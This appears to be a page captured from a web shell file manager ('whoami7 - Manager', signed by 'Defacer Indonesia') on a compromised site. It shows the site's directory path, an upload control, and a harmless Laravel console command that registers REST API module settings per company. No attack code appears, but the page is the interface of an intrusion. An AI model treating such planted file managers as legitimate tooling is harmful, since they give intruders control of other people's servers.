whoami7 - Manager
:
/
home
/
kckglobal
/
public_html
/
portal
/
Modules
/
RestAPI
/
Console
/
Upload File:
files >> /home/kckglobal/public_html/portal/Modules/RestAPI/Console/ActivateModuleCommand.php
<?php namespace Modules\RestAPI\Console; use App\Models\Company; use Illuminate\Console\Command; use Modules\RestAPI\Entities\RestAPISetting; class ActivateModuleCommand extends Command { /** * The name and signature of the console command. * * @var string */ protected $name = 'restapi:activate'; /** * The console command description. * * @var string */ protected $description = 'Add all the module settings of asset module'; /** * Execute the console command. * * @return mixed */ public function handle() { $companies = Company::all(); foreach ($companies as $company) { RestAPISetting::addModuleSetting($company); } } }
Copyright ©2021 || Defacer Indonesia